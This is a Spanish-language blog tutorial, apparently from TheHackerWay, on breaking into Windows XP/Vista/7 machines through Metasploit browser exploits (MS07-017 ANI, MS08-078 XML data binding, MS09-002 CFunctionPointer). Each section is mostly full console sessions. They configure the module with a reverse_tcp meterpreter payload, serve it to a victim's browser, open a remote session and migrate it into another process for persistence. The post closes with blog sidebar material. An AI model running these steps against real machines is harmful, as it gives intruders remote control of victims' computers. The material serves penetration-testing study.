Penetrando Sistemas Windows con MetaSploit FrameWork – Parte I
CONCEPTOS BASICOS DE PENETRACION EN MAQUINAS BAJO PLATAFORMA WINDOWS XP/VISTA/7 USANDO METASPLOIT FRAMEWORK – Parte I
En esta ocasión se indicarán algunas vulnerabilidades que pueden ser empleadas con el fin de comprometer sistemas bajo plataformas Windows usando MetaSploit Faremwork, cabe anotar que casi todos los exploits que se detallan a continuación, funcionan correctamente en casi todas las implementaciones de Windows, pero dependen directamente de la versión de IE instalada en la maquina objetivo.
Vulnerabilidad ANI
Se trata de una vulnerabilidad tradicional de buffer overflow que afecta a maquinas bajo Windows XP, 2003, 2008 y Vista, aprovechando una dirección de memoria vulnerable a ser sobrescrita y manipulada al gusto del atacante (o expresado de un modo mas adecuado, al gusto del programador) que es común a navegadores web tales como IE 6.X, IE 7.X, Opera, Safari y Firefox, su uso desde Metasploit resulta muy sencillo, como la mayoría de exploits desde la consola de MSF.
| msf exploit(handler) > use exploit/windows/browser/ms07_017_ani_loadimage_chunksize msf exploit(ms07_017_ani_loadimage_chunksize) > show options Module options (exploit/windows/browser/ms07_017_ani_loadimage_chunksize): Name Current Setting Required Description —- ————— ——– ———– SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 80 yes The daemon port to listen on SSL false no Negotiate SSL for incoming connections SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH / yes The URI to use. Exploit target: Id Name — —- 0 (Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista msf exploit(ms07_017_ani_loadimage_chunksize) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(ms07_017_ani_loadimage_chunksize) > set LHOST 192.168.1.34 LHOST => 192.168.1.34 msf exploit(ms07_017_ani_loadimage_chunksize) > set LPORT 4444 LPORT => 4444 msf exploit(ms07_017_ani_loadimage_chunksize) > set SRVPORT 8080 SRVPORT => 8080 msf exploit(ms07_017_ani_loadimage_chunksize) > exploit [*] Exploit running as background job. [*] Started reverse handler on 192.168.1.34:4444 [*] Using URL: http://0.0.0.0:8080/ [*] Local IP: http://192.168.1.34:8080/ [*] Server started. |
Una vez la víctima entra en la dirección donde se encuentra en ejecución el servicio MetaSploit, se envía el stager y se abre una sesión meterpreter.
| msf exploit(ms07_017_ani_loadimage_chunksize) >
[*] Attempting to exploit ani_loadimage_chunksize [*] Sending HTML page to 192.168.1.36:49280… [*] Attempting to exploit ani_loadimage_chunksize [*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 192.168.1.36:49280… [*] Sending stage (749056 bytes) to 192.168.1.36 [*] Meterpreter session 1 opened (192.168.1.34:4444 -> 192.168.1.36:49281) at Thu May 12 22:44:24 +0200 2011 |
VULNERABILIDAD EN DATA BINDING
Vulnerabilidad sobre las funciones de Data Binding XML de Internet Explorer 6.0, 7.0 y 8.0, el modulo existente en Metasploit para explotar esta vulnerabilidad utiliza una técnica llamada “Inyección de DLL en memoria con .NET” que crea un objeto vtable en una ubicación conocida con todos los métodos de dicho vtable apuntando hacia el payload del atacante, dado que el segmento .text (segmento ejecutable en Assembly) de la DLL de .NET no es escribible, un stub de código predefinido es utilizado para copiar el payload en un nuevo segmento de memoria y continuar la ejecución desde allí.
| msf > use exploit/windows/browser/ms08_078_xml_corruption
msf exploit(ms08_078_xml_corruption) > show options Module options (exploit/windows/browser/ms08_078_xml_corruption): Name Current Setting Required Description —- ————— ——– ———– SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH no The URI to use for this exploit (default is random) Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description —- ————— ——– ———– EXITFUNC process yes Exit technique: seh, thread, none, process LHOST 192.168.1.33 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name — —- 0 Automatic msf exploit(ms08_078_xml_corruption) > set LPORT 4446 LPORT => 4446 msf exploit(ms08_078_xml_corruption) > set SRVPORT 8082 SRVPORT => 8082 msf exploit(ms08_078_xml_corruption) > set URIPATH / URIPATH => / msf exploit(ms08_078_xml_corruption) > exploit [*] Exploit running as background job. [*] Started reverse handler on 192.168.1.33:4446 [*] Using URL: http://0.0.0.0:8082/ [*] Local IP: http://192.168.1.33:8082/ [*] Server started. |
Cuando el navegador de la victima accede a la ruta anteriormente establecida, se envía la DLL y comienza la corrupción de memoria, si resulta exitosa dicha inyección, se obtiene una sesión meterpreter.
| msf exploit(ms08_078_xml_corruption) >
[*] Sending DLL to 192.168.1.40:49229… [*] Sending Internet Explorer Data Binding Memory Corruption init HTML to 192.168.1.40:49229… [*] Sending Internet Explorer Data Binding Memory Corruption init HTML to 192.168.1.40:49229…[*] Sending exploit HTML to 192.168.1.40:49229 token=dll… [*] Sending stage (749056 bytes) to 192.168.1.40 [*] Meterpreter session 2 opened (192.168.1.33:4446 -> 192.168.1.40:49230) at Sat May 14 22:52:28 +0200 2011 |
Memory Corruption CfunctionPointer IE 7 (Windows XP/Vista)
Se trata de una vulnerabilidad relacionada con la función CfunctionPointer que consiste básicamente, en el aprovechamiento de un fallo de implementación de dicha función en donde se intenta acceder a memoria sin inicializar, de esta forma un atacante podría acceder remotamente, explotar esta vulnerabilidad y ejecutar código arbitrario en el sistema con los privilegios de la víctima.
| msf > use exploit/windows/browser/ms09_002_memory_corruption
msf >exploit(ms09_002_memory_corruption) > show options Module options (exploit/windows/browser/ms09_002_memory_corruption): Name Current Setting Required Description —- ————— ——– ———– SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH no The URI to use for this exploit (default is random) Exploit target: Id Name — —- 0 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7 msf exploit(ms09_002_memory_corruption) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(ms09_002_memory_corruption) > set LHOST 192.168.1.34 LHOST => 192.168.1.34 msf exploit(ms09_002_memory_corruption) > set LPORT 4445 LPORT => 4445 msf exploit(ms09_002_memory_corruption) > set SRVPORT 8082 SRVPORT => 8082 msf exploit(ms09_002_memory_corruption) > set URIPATH / URIPATH => / msf exploit(ms09_002_memory_corruption) > exploit [*] Exploit running as background job. [*] Started reverse handler on 192.168.1.34:4446 [*] Using URL: http://0.0.0.0:8082/ [*] Local IP: http://192.168.1.34:8082/ [*] Server started. |
Una vez un cliente ha entrado desde el navegador a la ruta donde se encuentra el servicio de metasploit ejecutándose, inmediatamente se obtiene una sesión meterpreter. Como característica interesante, el exploit intenta migrar el proceso a otro distinto con el fin de garantizar el acceso en el caso de que la víctima cierre el navegador.
| msf exploit(ms09_002_memory_corruption) >
[*] Sending Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption to 192.168.1.36:49356… [*] Sending stage (749056 bytes) to 192.168.1.36 [*] Meterpreter session 2 opened (192.168.1.34:4446 -> 192.168.1.36:49357) at Fri May 13 00:17:32 +0200 2011 [*] Session ID 2 (192.168.1.34:4446 -> 192.168.1.36:49357) processing InitialAutoRunScript ‘migrate -f’ [*] Current server process: iexplore.exe (1172) [*] Spawning a notepad.exe host process… [*] Migrating into process ID 1896 [*] New server process: notepad.exe (1896) |
Servicios en TheHackerWay
Descubre los productos y servicios enfocados a la seguridad informática que ofrecemos en TheHackerWay
Deep web: Privacidad y anonimato.
Compra el libro de "Deep Web: TOR, FreeNET & I2P - Privacidad y Anonimato"
Hacking con Python
Compra el libro de "Hacking con Python".
Python para Pentesters
Compra el libro de "Python para Pentesters".
Número de Visitas:
Sobre Adastra:
Soy un entusiasta de la tecnología y la seguridad informática, me siento atraído principalmente por la cultura y los fundamentos del Gray Hat Hacking.
Soy una persona afortunada de poder dedicar mi tiempo y energía en hacer lo que me apasiona, aprendiendo y compartiendo lo aprendido. Con bastante frecuencia iré publicando entradas relacionadas con estudios y técnicas que he ido asimilando a lo largo de mis investigaciones, todas enfocadas a las diferentes facetas de la informática con un énfasis especial en la seguridad.
Saludos y Happy Hack!
Twitter Adastra
- RT @verne: Hablamos con @AmarnaMiller: "No quiero ser inofensiva" ow.ly/pqa3304DPoB 20 hours ago
- RT @AwardsDarwin: #WisdomWednesday https://t.co/jNn4qqR97u 1 day ago
- RT @RubenSanchezTW: "Un país asquerosamente hipócrita". El spot de @AmarnaMiller trae más carga de profundidad que 80 discursos de Rajoy ht… 1 day ago
- RT @ThwAcademy: THW Labs para centros de formación y cursos de hacking y pentesting: eepurl.com/chjyjP 2 days ago
- RT @suntzu_es: No persigas a los enemigos cuando finjan una retirada, ni ataques tropas expertas. 2 days ago
- RT @AbSuira: Ningún software está exento de errores de diseño o programación @0xWORD @jdaanial #hackingconpython 2 days ago
- RT @gbergel: Solo quedan 24 días para @8dot8 Resistencia‼️😱 y que mejor que homenajear al pueblo mapuche que ha resistido 4 siglos ✊🏽 https… 3 days ago
Entradas recientes
- Junio, mes de cursos de Python en Securizame.
- Nueva temporada en THW Academy: Más cursos y lanzamiento de THW Labs
- Censys: Motor de búsqueda sobre dispositivos y servidores en Internet
- Entrevista a David Marugán (@RadioHacking)
- Inyección de código arbitrario en ejecutables con The Backdoor Factory
- Hackers y karatecas.
- Honeypots: Agrupación y gestión de honeypots con HoneyDrive – Parte 4
- Hoy vengo a hablar de mi libro: Deep Web: TOR, FreeNET & I2P – Privacidad y Anonimato
- PoC sobre vulnerabilidad en Whatsapp: WhatsappCrasher
- THW Academy: Plataforma de aprendizaje para hackers en castellano.
- Así he vivido la segunda edición de la DragonJAR Security Conference.
- DragonJAR Security Conference en Colombia.
- Pentesting automatizado con Beef. Consumiendo la API Rest de BeEF con Python – Parte 3
- Pluggable transports en TOR para la evasión de Deep Packet Inspection
- Pentesting automatizado con Beef. Características avanzadas – Parte 2
Entradas
Calendario de Entradas
Blogs Interesantes
Mensajes y Páginas Populares
- 10 sitios en la deep web de TOR que podrían interesarte - Parte 1 de 3
- 20 sitios en la web profunda de TOR que te podrían interesar
- 10 Sitios en la deep web que podrían interesarte - Parte 2 de 3
- ¿Qué es el Hacking?
- 21 Blogs sobre seguridad informática que deberías conocer, en castellano.
- 10 Sitios en la deep web que podrían interesarte – Parte 3 de 3
- Hydra, Ataques de Fuerza Bruta
- Conceptos Basicos de Meterpreter - MetaSploit Framework
- Comandos y Conceptos Básicos MetaSploit Framework
- 7 ideas de desarrollo de software enfocadas a la seguridad informática para el 2015
Categorías
adastraTop Clicks
